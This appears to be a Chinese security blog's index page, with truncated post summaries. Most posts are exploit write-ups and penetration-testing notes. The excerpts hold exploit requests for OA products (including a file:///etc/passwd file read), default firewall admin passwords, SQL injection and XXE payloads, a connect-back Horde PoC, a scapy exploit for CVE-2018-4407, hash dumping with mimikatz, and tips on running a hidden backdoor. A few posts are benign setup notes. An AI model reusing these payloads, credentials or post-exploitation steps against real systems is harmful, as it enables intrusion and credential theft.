摘要: 2020年9月20日00:00左右,蜜罐设备告警发现攻击,溯源后,于全流量设备上捕捉到如下请求包 POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompr 阅读全文
posted @ 2020-09-20 10:01 r1ch4rd_L 阅读(2387) 评论(0) 推荐(0)
摘要: 攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 影响版本 Windows Server 2008 R2 for x64-based Systems Service P 阅读全文
posted @ 2020-09-16 05:52 r1ch4rd_L 阅读(639) 评论(0) 推荐(0)
摘要: 源代码分析: 问题出现在 ha_request.php 文件,第 37 行的 exec 函数,$url 为用户可控的变量,可见第 33 和 34 行。目光来到第 23 和 24 行,只要 node_request 函数的返回值为“OK”,即可跳过 fatal 函数(此函数为自定义函数,作用类似 PH 阅读全文
posted @ 2020-09-13 21:43 r1ch4rd_L 阅读(2814) 评论(0) 推荐(0)
摘要: 天融信防火墙 用户名:superman 密码:talent 天融信防火墙 用户名:superman 密码:talent!23 联想网御防火墙 用户名:admin 密码:leadsec@7766、administrator、bane@7766 深信服防火墙 用户名:admin 密码:admin 启明星 阅读全文
posted @ 2020-09-13 21:37 r1ch4rd_L 阅读(5988) 评论(0) 推荐(0)
摘要: 上一篇文章:泛微云桥任意文件读取漏洞 利用方式: 第一步: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt 第二步: /file/fileNoLogin/id 注: downloadUrl参数填写文件的绝对 阅读全文
posted @ 2020-09-13 21:35 r1ch4rd_L 阅读(1444) 评论(0) 推荐(0)
摘要: saturn:~ mr_me$ ./poc.py (+) usage ./poc.py <target> <path> <user:pass> <connectback:port> (+) eg: ./poc.py 172.16.175.148 /horde/ hordeuser:pass123 1 阅读全文
posted @ 2020-09-13 21:18 r1ch4rd_L 阅读(557) 评论(0) 推荐(0)
摘要: 受影响版本: Apache Cocoon <= 2.1.x 程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到XML注入的安全问题。 以下是apache社区官方提供利用方式: <!--?xml ver 阅读全文
posted @ 2020-09-13 21:15 r1ch4rd_L 阅读(1753) 评论(0) 推荐(0)
摘要: GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 User-Agent: curl/7.29.0 Host: xxxxx Accept: */* GET /file/f 阅读全文
posted @ 2020-09-12 17:38 r1ch4rd_L 阅读(3212) 评论(0) 推荐(0)
摘要: POST /Proxy HTTP/1.1 Accept: Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host Co 阅读全文
posted @ 2020-09-11 17:27 r1ch4rd_L 阅读(2629) 评论(0) 推荐(0)
摘要: POST /acc/clsf/report/datasource.php HTTP/1.1 Host: Connection: close Accept: text/javascript, text/html, application/xml, text/xml, */* X-Prototype-V 阅读全文
posted @ 2020-09-11 11:14 r1ch4rd_L 阅读(643) 评论(0) 推荐(0)
摘要: 绿盟UTS综合威胁探针管理员任意登录 漏洞详情: 绿盟全流量威胁分析解决方案针对原始流量进行采集和监控,对流量信息进行深度还原、存储、查询和分析,可以及时掌握重要信息系统相关网络安全威胁风险,及时检测漏洞、病毒木马、网络攻击情况,及时发现网络安全事件线索,及时通报预警重大网络安全威胁,调查、防范和打 阅读全文
posted @ 2020-09-11 11:11 r1ch4rd_L 阅读(1976) 评论(0) 推荐(0)
摘要: 漏洞原理: dev_linkage_launch.php 为设备联动的新入口点主要是将联动的接口构造成业务统一处理的接口 主要调用 跟进 可以看到 第一个检查为 $req_url = $_SERVER['PHP_SELF']; 绕过第一个检查: 在他们系统nginx配置文件里面: 通过nginx规则 阅读全文
posted @ 2020-09-11 10:58 r1ch4rd_L 阅读(3099) 评论(0) 推荐(0)
摘要: 1.1发送文件(公网发内网) 文件发送端: nc -lp 6666 < 文件 文件接收端: nc 发送端ip 发送端端口 > 新文件 1.2发送文件(内网发公网)文件发送端: nc -lp 6666 > 文件 文件接收端: nc 发送端ip 发送端端口 < 新文件 2.聊天发送端: nc -lp 6 阅读全文
posted @ 2020-09-01 11:32 r1ch4rd_L 阅读(804) 评论(1) 推荐(0)
摘要: ubuntu20.04上边部署了一个新的mysql服务,默认没密码,想要修改密码。 使用如下手段 第一种:ALTER USER 'root'@'localhost' IDENTIFIED BY '密码'; 第二种: update user set authentication_string=pass 阅读全文
posted @ 2020-08-31 09:30 r1ch4rd_L 阅读(3572) 评论(0) 推荐(1)
摘要: 漏洞列表 #CVE #Description #Kernels CVE–2018–18955 [map_write() in kernel/user_namespace.c allows privilege escalation](Linux kernel 4.15.x through 4.19.x 阅读全文
posted @ 2020-08-28 13:49 r1ch4rd_L 阅读(1512) 评论(1) 推荐(1)
摘要: #Security Bulletin #KB #Description #Operating System CVE-2020-0787 [Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerabil 阅读全文
posted @ 2020-08-28 09:34 r1ch4rd_L 阅读(3403) 评论(0) 推荐(0)
摘要: SQL注入 POC(11.5版本无需登录) 漏洞参数:SORT_ID,FILE_SORT 审计版本:通达OA 11.5 POST /general/file_folder/swfupload_new.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 1 阅读全文
posted @ 2020-08-25 10:14 r1ch4rd_L 阅读(636) 评论(0) 推荐(0)
摘要: 注入点产生位置 注入payload 1593360000' AND if((1<0),SLEEP(0),sleep(2)) and '1 不产生延迟 产生延迟 阅读全文
posted @ 2020-08-25 10:13 r1ch4rd_L 阅读(196) 评论(0) 推荐(0)
摘要: 需要OpenGL库:https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyopengl #coding:utf-8 from OpenGL.GL import * from OpenGL.GLUT import * class fractal(object): 阅读全文
posted @ 2020-08-25 08:41 r1ch4rd_L 阅读(1090) 评论(0) 推荐(0)
摘要: 验证码逻辑错误 文件:tool/log/l.php的第93行 阅读全文
posted @ 2020-08-24 17:40 r1ch4rd_L 阅读(325) 评论(0) 推荐(0)
摘要: 任意文件读取 文件:store/cat.php第413行 read_file函数定义在该文件272行 阅读全文
posted @ 2020-08-24 17:39 r1ch4rd_L 阅读(1018) 评论(0) 推荐(0)
摘要: 第一处代码执行 文件:tool/php_cli.php第64行 第二处代码执行 文件:tool/mdd_sql.php第133行 第三处代码执行 文件:tool/log/c.php 理论上四个变量都可导致代码执行 阅读全文
posted @ 2020-08-24 17:37 r1ch4rd_L 阅读(1231) 评论(0) 推荐(0)
摘要: 前提:在渗透测试过程中,对于windows系统的机器渗透需要注意hash的获取,其中hash分为LM-HASH与NTLM-HASH,在windows系统中,hash的默认存储位置为: C:\Windows\System32\config\SAM 各种工具: mimikatz privilege::d 阅读全文
posted @ 2020-08-04 14:33 r1ch4rd_L 阅读(1263) 评论(0) 推荐(0)
摘要: 前提:CS已经获取到session,可以进入图形化管理机器,现在需要使用msf进行进一步渗透,需要msf的metepreter。 开启msf msf设置监听 msf > use exploit/multi/handler msf exploit(handler) > set payload wind 阅读全文
posted @ 2020-08-04 14:30 r1ch4rd_L 阅读(786) 评论(0) 推荐(0)
摘要: 前提:MFS已经获取到session,可以进入metepreter,现在需要使用cobaltstrike进行图形化管理或团队协作。 cobaltstrike起一个beacon监听,如使用:windows/beacon_http/reverse_http 设置好host和port之后启动监听。 MSF 阅读全文
posted @ 2020-08-04 14:25 r1ch4rd_L 阅读(958) 评论(0) 推荐(0)
摘要: 前提:拿下边界机之后,进入内网,想用nmap怎么办? CS可以开启代理,但是是socks4的代理,只能使用tcp协议,所以nmap使用的时候要使用-sT选择使用tcp_协议,要使用-Pn不使用ICMP_的ping确认主机存活 阅读全文
posted @ 2020-08-04 14:20 r1ch4rd_L 阅读(3778) 评论(0) 推荐(1)
摘要: 运行后门时,有些后门不能中断。双击运行这种后门会产生一个黑框。 一条命令就能使其在后台执行 命令解释: start-process启动一个进程 -windowstyle窗口样式 hidden隐藏 阅读全文
posted @ 2020-08-04 14:17 r1ch4rd_L 阅读(837) 评论(0) 推荐(0)
摘要: 1.信息收集 1.1.windows 1.1.1用户操作 query user #查看当前在线的用户 whoami #查看当前用户 net user #查看当前系统的用户 net1 user #查看当前系统的用户 net user /domain #查看当前域里面的用户 net user admin 阅读全文
posted @ 2020-08-04 14:15 r1ch4rd_L 阅读(668) 评论(0) 推荐(0)
摘要: 来源:清华大学开源软件镜像站(https://mirror.tuna.tsinghua.edu.cn/help/homebrew/) 替换现有上游 1 # brew 程序本身,Homebrew/Linuxbrew 相同 2 git -C "$(brew --repo)" remote set-url 阅读全文
posted @ 2020-08-04 10:01 r1ch4rd_L 阅读(3722) 评论(0) 推荐(0)
摘要: CVE-2018-4407为ios缓冲区溢出漏洞 exp: import scapyfrom scapy.all import * send(IP(dst="同一局域网内目标Ip",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1" 阅读全文
posted @ 2019-03-09 19:35 r1ch4rd_L 阅读(594) 评论(0) 推荐(0)
摘要: 这是我第一篇博客,写的不好请谅解 ____________________________(分割线)_______________________________ 在kali linux系统下自带工具中有个arp神器叫做“arpspoof”,废话不多说,直接上手 此次实验环境为靶机与FTP服务器之间 阅读全文
posted @ 2016-11-13 17:30 r1ch4rd_L 阅读(7214) 评论(1) 推荐(0)